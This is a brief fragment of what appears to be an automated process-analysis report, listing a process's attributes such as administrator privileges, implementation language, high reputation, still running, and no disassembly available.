                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          No disassembly